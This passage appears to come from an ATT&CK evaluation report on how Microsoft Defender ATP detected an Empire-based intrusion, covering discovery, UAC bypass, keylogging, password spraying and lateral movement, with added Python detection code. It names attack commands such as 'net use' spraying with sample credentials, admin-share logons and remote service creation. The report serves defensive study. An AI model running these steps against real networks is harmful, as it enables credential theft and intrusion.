Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Additional telemetry showing powershell.exe execution sequence resulting from WinEnum
Specific Behavior alert for "A malicious PowerShell Cmdlet was invoked on the machine"
Process tree under alert "A malicious PowerShell Cmdlet was invoked on the machine" showing Invoke-Empire and Invoke-WinEnum
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner/User Discovery
(T1033)
None
  
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
None
  
No detection capability demonstrated for this procedure.
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-SysInfo.
Telemetry of execution sequence showing Get-SysInfo invocation
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-HotFix.
Telemetry of execution sequence showing Get-HotFix invocation
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
None
  
No detection capability demonstrated for this procedure.
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-Service.
Telemetry of execution sequence showing Get-Service invocation
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo.
Telemetry of execution sequence showing Get-NetInfo invocation
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo and subsequent execution of netstat.exe with command-line arguments from powershell.exe. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing Get-NetInfo invocation
Telemetry of execution sequence showing powershell.exe executing netstat.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing netstat.exe with command-line arguments
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert called "Reconnaissance using directory services queries" was generated for domain user enumeration. The vendor noted this was an Azure Advanced Threat Protection alert.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
Specific Behavior alert showing domain user enumeration from Bob on CodeRed against Domain Controller on Creeper
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert).
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution of net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert).
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution of net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed execution of netstat.exe (tainted by parent PowerShell malicious cmdlet alert).
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution of netstat.exe (tainted by parent PowerShell malicious cmdlet alert)
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific netstat.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing netstat.exe with command-line arguments
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed execution of reg.exe with command-line arguments (tainted by suspicious sequence of exploration activities alert).
Telemetry showing execution of reg.exe and command-line arguments
Process tree view of suspicious sequence of exploration activities alert showing tainted relationship to reg.exe
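The discovery steps from 12.A.1 through 13.C.1 are all classified the same way: "Telemetry (Tainted)" because the powershell.exe parent already carried a PowerShell alert, and from 12.D.1 onward "General Behavior (Delayed)" because a correlation alert over the chain of discovery commands fired only once enough of them had occurred. The following is an added example of both mechanisms in code; it is not the page's or Microsoft's logic. It propagates taint from an alerted process to its descendants, correlates distinct discovery actions per parent inside a time window, and labels each event with the page's vocabulary. The record shape, timestamps, pids, the script path, the registry key, the window and threshold values, and the one-off admin control are assumptions made for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set


@dataclass(frozen=True)
class ProcEvent:
    """Process-creation record (constructed shape, not the WDATP schema)."""
    ts: int        # seconds from an arbitrary start
    pid: int
    ppid: int
    image: str     # executable file name, lower case
    cmdline: str


DISCOVERY_IMAGES = {"route.exe", "ipconfig.exe", "whoami.exe", "qprocess.exe", "netstat.exe", "reg.exe"}


def discovery_action(e: ProcEvent) -> Optional[str]:
    """Map an event to a discovery action, or None. net.exe is keyed on its
    subcommand so "net user", "net group" and "net localgroup" count as
    separate steps of the chain, as they do in 12.D through 13.B."""
    args = e.cmdline.split()
    if e.image == "net.exe" and len(args) > 1:
        return "net " + args[1].lower()
    return e.image if e.image in DISCOVERY_IMAGES else None


def taint_set(events: Iterable[ProcEvent], alerted_pids: Iterable[int]) -> Set[int]:
    """The page's "Tainted" modifier: an alert on a process colours the
    telemetry of every descendant. Walk the tree down from the alerted pids."""
    children: Dict[int, List[int]] = defaultdict(list)
    for e in events:
        children[e.ppid].append(e.pid)
    tainted: Set[int] = set()
    stack = list(alerted_pids)
    while stack:
        pid = stack.pop()
        if pid not in tainted:
            tainted.add(pid)
            stack.extend(children[pid])
    return tainted


def discovery_sequence_alerts(events: Iterable[ProcEvent], window: int = 600, threshold: int = 4) -> List[dict]:
    """Delayed correlation in the spirit of "Suspicious sequence of exploration
    activities": fire once per parent when `threshold` distinct discovery
    actions occur within `window` seconds. The alert is "delayed" because it
    cannot exist before the Nth step; "covers" lists the chain from its first
    member onward, which is what lets earlier telemetry be attributed to it."""
    by_parent: Dict[int, List[ProcEvent]] = defaultdict(list)
    for e in sorted(events, key=lambda x: x.ts):
        if discovery_action(e):
            by_parent[e.ppid].append(e)
    alerts = []
    for ppid, evs in by_parent.items():
        for i, last in enumerate(evs):
            win = [x for x in evs[: i + 1] if last.ts - x.ts <= window]
            actions = {discovery_action(x) for x in win}
            if len(actions) >= threshold:
                start = evs.index(win[0])
                alerts.append({"ppid": ppid, "first_ts": win[0].ts, "fired_at": last.ts,
                               "actions": sorted(actions), "covers": [x.pid for x in evs[start:]]})
                break   # one alert per parent; later steps extend the same chain
    return alerts


def classify(events: List[ProcEvent], alerted_pids: Iterable[int], **kw) -> Dict[int, List[str]]:
    """Label each discovery event the way the page's table does."""
    tainted = taint_set(events, alerted_pids)
    covered: Set[int] = set()
    for a in discovery_sequence_alerts(events, **kw):
        covered.update(a["covers"])
    labels: Dict[int, List[str]] = {}
    for e in events:
        if not discovery_action(e):
            continue
        labels[e.pid] = ["Telemetry (Tainted)" if e.pid in tainted else "Telemetry"]
        if e.pid in covered:
            labels[e.pid].append("General Behavior (Delayed)")
    return labels


# Constructed events: the Empire agent in powershell.exe (pid 500) running the
# discovery commands of steps 12 and 13; pids 600/601 are a one-off admin check.
# Timestamps, pids, the script path and the registry key are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(0, 400, 300, "wscript.exe", r"wscript.exe C:\Users\Bob\Downloads\autoupdate.vbs"),
    ProcEvent(5, 500, 400, "powershell.exe", "powershell.exe -NoProfile -WindowStyle Hidden"),
    ProcEvent(10, 501, 500, "route.exe", "route print"),
    ProcEvent(40, 502, 500, "ipconfig.exe", "ipconfig /all"),
    ProcEvent(70, 503, 500, "whoami.exe", "whoami /all /fo list"),
    ProcEvent(100, 504, 500, "qprocess.exe", "qprocess *"),
    ProcEvent(130, 505, 500, "net.exe", "net start"),
    ProcEvent(160, 506, 500, "net.exe", 'net group "Domain Admins" /domain'),
    ProcEvent(190, 507, 500, "net.exe", "net localgroup administrators"),
    ProcEvent(220, 508, 500, "net.exe", "net user"),
    ProcEvent(250, 509, 500, "netstat.exe", "netstat -ano"),
    ProcEvent(280, 510, 500, "reg.exe", r"reg query HKLM\SYSTEM\CurrentControlSet\Services"),
    ProcEvent(60, 600, 100, "cmd.exe", "cmd.exe"),
    ProcEvent(65, 601, 600, "ipconfig.exe", "ipconfig /all"),
]
# The "malicious PowerShell cmdlet" alert on the Empire process.
ALERTED_PIDS = {500}

if __name__ == "__main__":
    for a in discovery_sequence_alerts(SAMPLE_EVENTS):
        print("alert:", a)
    for pid, labels in sorted(classify(SAMPLE_EVENTS, ALERTED_PIDS).items()):
        print(pid, labels)
```

Two design points matter in practice. Taint is a property of the process tree, not of the event, so a single alert on the agent process retroactively explains every child it spawns; that is why the page's notes keep citing the same parent alert. The sequence rule keys on distinct actions rather than event count, otherwise the repeated net.exe invocations of 12.D through 13.B would fire it on the first tool alone.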
14.A.1
Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
Bypass User Account Control
(T1088)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing the Empire cmdlet "Invoke-BypassUACTokenManipulation" in the context of user Bob at medium integrity, svchost.exe hosting the seclogon (Secondary Logon) service being used to start a new high-integrity powershell.exe process as SYSTEM, and the subsequent adjustment of that powershell.exe's context to user Bob (tainted by the parent alert for suspicious sequence of exploration activities).
Telemetry showing medium integrity powershell.exe process executing Invoke-BypassUACTokenManipulation as user Bob
Telemetry showing high integrity powershell.exe process as SYSTEM
Telemetry showing high integrity powershell.exe process as Bob
Parent alert for "Suspicious sequence of exploration activities" showing powershell.exe process tainting this event
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed that a connection to 192.168.0.5 (C2 server) over port 8080 was made (tainted by the alert on suspicious PowerShell command-line arguments).
Telemetry showing network connection to 192.168.0.5 (C2 server) over port 8080
Telemetry showing decoded PowerShell script with download HTTP request of wdbypass over port 8080 and tainted relationship to alert on suspicious PowerShell command-line arguments
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed a network connection to 192.168.0.5 (C2 server) over port 8080, as well as decoded PowerShell making a connection over port 8080 with an HTTP request to download the wdbypass payload (tainted by the alert on suspicious PowerShell command-line arguments).
Telemetry showing network connection to 192.168.0.5 (C2 server) over port 8080
Telemetry showing decoded PowerShell script with download HTTP request of wdbypass over port 8080 and tainted relationship to alert on suspicious PowerShell command-line arguments
Standard Application Layer Protocol
(T1071)
Telemetry (Tainted)
  
 
Telemetry showed that an invoked, decoded PowerShell script created a web request to the C2 server, with related data showing the connection was made (tainted by the alert on suspicious PowerShell command-line arguments).
Telemetry showing decoded PowerShell script with download HTTP request of wdbypass over port 8080 and tainted relationship to alert on suspicious PowerShell command-line arguments
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
Input Capture
(T1056)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe making API calls consistent with keylogger behavior. Telemetry also showed execution of the Get-Keystrokes Empire PowerShell cmdlet (tainted by the alert on PowerShell script with suspicious content). The vendor stated that input capture telemetry is collected but was not immediately visible in the portal; the vendor changed the portal during the test to show these events by default.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated on keylogging activity in powershell.exe.
Telemetry showing keylogger events
Telemetry showing execution of Get-Keystrokes cmdlet
Parent alert showing process tree view showing tainted relationship (specific instance of this technique not shown in the alert)
Specific Behavior alert for keylogging activity from powershell.exe
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
None
  
No detection capability demonstrated for this procedure, though telemetry was available that showed execution of Get-Content PowerShell cmdlet. Data does not show what file the cmdlet was executed on.
Telemetry showing "Get-Content" cmdlet (does not count as a detection)
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying (tainted by the parent alert on PowerShell script with suspicious content). Telemetry also showed the authentication failures due to bad passwords, indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on those systems.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated for a brute-force attempt accessing remote SMB shares with different accounts. The alert spans multiple logon attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Execution sequence showing net.exe logon failure to Morris due to WebDAV fallback authentication attempt over port 80 to the C2 server
Specific Behavior alert for brute force attempt to remote SMB shares
System access history from CodeRed to Nimda and Morris
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts to ADMIN$ via net.exe with command-line arguments (tainted by the parent alert on PowerShell script with suspicious content). Telemetry also showed the authentication failures due to bad passwords, indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on those systems.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated for a brute-force attempt accessing remote SMB shares with different accounts. The alert spans multiple logon attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Execution sequence showing net.exe logon failure to Morris due to WebDAV fallback authentication attempt over port 80 to the C2 server
Specific Behavior alert for brute force attempt to remote SMB shares
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content).
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated for a brute-force attempt accessing remote SMB shares with different accounts. The alert spans multiple logon attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Specific Behavior alert for brute force attempt to remote SMB shares
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments using the valid credentials of user Kmitnick (tainted by the parent alert on PowerShell script with suspicious content). Telemetry also showed a Kmitnick logon event on 10.0.0.5 (Conficker) and that 10.0.1.5 (CodeRed) accessed resources on 10.0.0.5 (Conficker).
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry showing user Kmitnick login activity on 10.0.0.5 (Conficker)
Telemetry showing 10.0.1.5 (CodeRed) system accessed resources on 10.0.0.5 (Conficker)
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, eventually resulting in a successful logon (tainted by parent alert on PowerShell script with suspicious content).
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated for a brute-force attempt accessing remote SMB shares with different accounts. The alert spans multiple logon attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Specific Behavior alert for brute force attempt to remote SMB shares
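Detection logic for the spray in 16.A.1 and the successful logon that follows it in 16.B.1, added here as an example and not the page's or Microsoft's code. It parses constructed net.exe command lines into (host, share, user), joins each attempt to the port-80 WebDAV fallback connection the telemetry notes above describe as the bad-password indicator, and raises one alert per source host when several accounts are tried within a window, carrying any success in the same chain so the spray-then-logon is visible in one place. The record shapes, host names, pids, timestamps, the password, the window and account thresholds, and the Morris control record are assumptions made for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class NetUse:
    """net.exe process-creation record (constructed shape)."""
    ts: int
    source: str      # host the command ran on
    pid: int
    cmdline: str


@dataclass(frozen=True)
class NetConn:
    """Outbound connection record for the same pid (constructed shape)."""
    ts: int
    source: str
    pid: int
    dest_port: int


def parse_net_use(cmdline: str) -> Optional[Tuple[str, str, Optional[str]]]:
    """Parse "net use \\\\host\\share [password] /user:DOMAIN\\user" into
    (host, share, user). Returns None for listings, /delete and other net
    subcommands. The positional password is deliberately not returned: it is
    in the command line, so the telemetry has it, but a detection record
    should not carry it around."""
    toks = cmdline.split()
    if len(toks) < 3 or not toks[0].strip('"').lower().endswith(("net", "net.exe")):
        return None
    if toks[1].lower() != "use" or any(t.lower() == "/delete" for t in toks):
        return None
    target = toks[2]
    if not target.startswith("\\\\"):
        return None
    host, _, share = target[2:].partition("\\")
    user = next((t[len("/user:"):] for t in toks[3:] if t.lower().startswith("/user:")), None)
    return host, share, user


def spray_alerts(uses: Iterable[NetUse], conns: Iterable[NetConn],
                 window: int = 300, min_accounts: int = 3) -> List[dict]:
    """Fire once per source host when it tries `min_accounts` distinct accounts
    against shares within `window` seconds. An attempt counts as failed when
    the same pid then connected to port 80 (the WebDAV fallback the page's
    telemetry showed on bad-password attempts). Successful attempts in the
    chain are reported alongside, which is the 16.B.1 case."""
    fallback = {(c.source, c.pid) for c in conns if c.dest_port == 80}
    attempts: Dict[str, List[dict]] = defaultdict(list)
    for u in sorted(uses, key=lambda x: x.ts):
        parsed = parse_net_use(u.cmdline)
        if parsed and parsed[2]:
            host, share, user = parsed
            attempts[u.source].append({"ts": u.ts, "host": host, "share": share,
                                       "user": user.lower(), "failed": (u.source, u.pid) in fallback})
    alerts = []
    for source, atts in attempts.items():
        for i, last in enumerate(atts):
            win = [a for a in atts[: i + 1] if last["ts"] - a["ts"] <= window]
            users = {a["user"] for a in win}
            if len(users) >= min_accounts:
                chain = atts[atts.index(win[0]):]
                alerts.append({"source": source, "fired_at": last["ts"], "accounts": sorted(users),
                               "targets": sorted({a["host"] for a in win}),
                               "failed": sum(a["failed"] for a in win),
                               "successes": [(a["user"], a["host"]) for a in chain if not a["failed"]]})
                break
    return alerts


# Constructed records for 16.A.1/16.B.1: CodeRed sprays one password across
# Kmitnick, Bob and Frieda at Morris and Nimda, then succeeds as Kmitnick at
# Conficker. Timestamps, pids, the password and the Morris control are assumptions.
SAMPLE_USES = [
    NetUse(0, "CodeRed", 700, r"net use \\10.0.1.4\ADMIN$ Spring2018 /user:Kmitnick"),
    NetUse(5, "CodeRed", 701, r"net use \\10.0.1.6\ADMIN$ Spring2018 /user:Kmitnick"),
    NetUse(10, "CodeRed", 702, r"net use \\10.0.1.4\ADMIN$ Spring2018 /user:Bob"),
    NetUse(15, "CodeRed", 703, r"net use \\10.0.1.6\ADMIN$ Spring2018 /user:Bob"),
    NetUse(20, "CodeRed", 704, r"net use \\10.0.1.4\ADMIN$ Spring2018 /user:Frieda"),
    NetUse(25, "CodeRed", 705, r"net use \\10.0.1.6\ADMIN$ Spring2018 /user:Frieda"),
    NetUse(60, "CodeRed", 706, r"net use \\10.0.0.5\ADMIN$ Spring2018 /user:Kmitnick"),
    NetUse(90, "CodeRed", 707, r"net use \\10.0.0.5\ADMIN$ /delete"),
    NetUse(0, "Morris", 800, r"net use \\10.0.0.5\Wormshare /user:Debbie"),
]
FAILED_PIDS = {700, 701, 702, 703, 704, 705}
SAMPLE_CONNS = [NetConn(u.ts, u.source, u.pid, 445) for u in SAMPLE_USES if u.pid != 707] + \
               [NetConn(u.ts + 1, u.source, u.pid, 80) for u in SAMPLE_USES if u.pid in FAILED_PIDS]

if __name__ == "__main__":
    for a in spray_alerts(SAMPLE_USES, SAMPLE_CONNS):
        print(a)
```

The fallback join has the same blind spot the notes above describe: only a bad password makes the SMB client retry over WebDAV, so an attempt that authenticated and was then refused access (the insufficient-access cases the telemetry did not indicate) looks like a success here. A production rule should join the target host's logon and share-access audit events rather than infer the outcome from the client side alone.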
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry (Tainted)
  
 
Telemetry showed net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content).
Telemetry showing net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content).
Telemetry showing net.exe logon attempt to C$ on 10.0.0.4 (Creeper) with valid credentials for the account Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed that the logon event for Kmitnick on Creeper was successful.
Telemetry showing net.exe logon attempt to C$ on 10.0.0.4 (Creeper) with valid credentials for the account Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry from query showing successful Kmitnick logon event for Creeper
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe creating autoupdate.vbs (tainted by parent alert on PowerShell script with suspicious content).
Telemetry showing autoupdate.vbs creation (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing autoupdate.vbs via wscript.exe as user Kmitnick. The execution generated three new PowerShell-related alerts for the initial execution sequence of Empire; these tainted this event but were not counted as separate detections for this technique.
Telemetry showing cmd.exe executing autoupdate.vbs as user Kmitnick (tainted by parent PowerShell alerts)
Parent alert for PowerShell with suspicious command-line tainting powershell.exe (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Parent alert for PowerShell script with suspicious content tainting powershell.exe (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Parent alert for malicious PowerShell cmdlet tainting powershell.exe (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed creation of update.vbs on 10.0.0.4 (Creeper) and the remote file copy action from 10.0.1.5 (CodeRed) (the remote file copy event on CodeRed was tainted by parent PowerShell alerts).
Telemetry showing file creation of update.vbs on 10.0.0.4 (Creeper)
Telemetry showing remote creation of update.vbs on 10.0.0.4 (Creeper) from 10.0.1.5 (CodeRed)
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed sc.exe command remotely querying services on Creeper (tainted by parent alert on PowerShell script with suspicious content).
Telemetry from CodeRed showing execution sequence of sc.exe service query to Creeper
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Telemetry (Tainted)
  
 
